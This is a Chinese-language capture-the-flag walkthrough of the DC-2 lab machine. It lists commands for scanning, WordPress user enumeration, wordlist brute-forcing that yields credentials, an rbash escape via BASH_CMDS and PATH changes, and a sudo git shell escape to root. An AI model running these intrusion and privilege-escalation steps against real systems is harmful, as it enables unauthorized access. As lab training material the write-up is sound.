信息收集:寻找靶机真实IP
nmap -sP 192.168.26.0/24
然后探索端口及服务
nmap -A -p- -v 192.168.26.130
这里出现了开放的80端口
找到虚拟机里的火狐浏览器输入虚拟机电脑的IP会访问失败,回到终端
输入vim /etc/hosts修改文件
再次到火狐搜索成功后出现这个界面
然后找到 flag 点开
意思就是暴力破解账号和密码
然后回到终端输入 dirb http://dc-2/ 列出一个目录
找到网址后回到火狐搜索
会出现这个登录界面
然后使用wpscan --url http://dc-2
找到wordpress的版本4.7.10
再次尝试登录输入用户名和密码,提示用户名并不存在,可以使用用户名枚举
wpscan --url http://dc-2 --enumerate u 来尝试利用枚举爆破密码
分别出现了admin和jerry还有tom
根据flag1可以用暴力破解账号密码,可以使用两个代码分别是cewl http://dc-2/ -w dict.txt 或者 cewl http://dc-2/ > 1.txt
wpscan可以进行暴力破解
wpscan --url http://dc-2 --passwords dc2.txt
可以看到爆出了两个账号密码
回到登录页面登录账号 tom/parturient
在尝试 jerry/adipiscing 登录
发现 Jerry 的账号点开pages里面会有flag2然后点开
回到终端 ssh tom@192.168.26.130 -p 7744 登录ssh
注意这里输入tom的密码并不显示
输入 ls 发现 flag3
接下来,尝试rbash绕过详情参考 https://xz.aliyun.com/t/7642
找到可以用的命令
echo $PATH
输入 cd /home/tom usr/bin发现进不去,在使用 ls /home/tom usr/bin
再使用echo
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /*
输入tom的密码,输入su - jerry再输入jerry的密码再输入sudo -l
然后进行提权,查看一下可以使用的root权限命令
find / -user root -perm -4000 -print 2>/dev/null
jerry用户也可以直接sudo su
使用git命令进行提取
sudo git help status
输入!/bin/sh退出
然后输入 cd /root 和 cat final-flag.txt